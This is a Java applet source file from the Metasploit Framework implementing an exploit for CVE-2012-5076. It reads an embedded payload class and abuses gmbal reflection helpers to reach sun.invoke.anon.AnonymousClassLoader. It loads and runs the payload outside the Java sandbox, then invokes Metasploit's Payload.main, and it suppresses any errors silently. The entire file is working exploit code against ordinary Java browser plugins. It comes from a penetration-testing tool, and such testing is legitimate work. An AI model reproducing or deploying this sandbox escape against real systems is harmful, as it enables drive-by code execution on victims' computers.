metasploit-framework/external/source/exploits/cve-2012-5076/Exploit.java

import java.applet.Applet;
import java.io.PrintStream;
import java.io.Serializable;
import java.lang.reflect.Method;
import com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory;
import com.sun.org.glassfish.gmbal.util.GenericConstructor;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import metasploit.Payload;
//import java.lang.Runtime;

public class Exploit extends Applet
{

    public Exploit()
    {
    }
    
	public byte[] hex2Byte(String str)
    {
       byte[] bytes = new byte[str.length() / 2];
       for (int i = 0; i < bytes.length; i++)
       {
          bytes[i] = (byte) Integer
                .parseInt(str.substring(2 * i, 2 * i + 2), 16);
       }
       return bytes;
    }
    

    public void init()
    {
        try
        {
			ByteArrayOutputStream bos = new ByteArrayOutputStream();
			byte[] buffer = new byte[8192];
			int length;

			// read in the class file from the jar
			InputStream is = getClass().getResourceAsStream("MyPayload.class");
			// and write it out to the byte array stream
			while( ( length = is.read( buffer ) ) > 0 )
				bos.write( buffer, 0, length );
			// convert it to a simple byte array
			buffer = bos.toByteArray();			
			
            GenericConstructor genericconstructor = new GenericConstructor(Object.class, "sun.invoke.anon.AnonymousClassLoader", new Class[0]);
            Object obj = genericconstructor.create(new Object[] {});                        
			Method method = ManagedObjectManagerFactory.getMethod(obj.getClass(), "loadClass", new Class[] { byte[].class });
            Class class1 = (Class)method.invoke(obj, new Object[] {
                //byte_payload
                buffer
            });
            class1.newInstance();
            //System.out.println("SecurityManager:" + System.getSecurityManager());
            //class1.getMethod("r", new Class[0]).invoke(class1, new Object[0]);
            Payload.main(null);
            //Runtime.getRuntime().exec("calc.exe");
        }
        catch(Exception exception)
        {
            //exception.printStackTrace();
        }
    }

}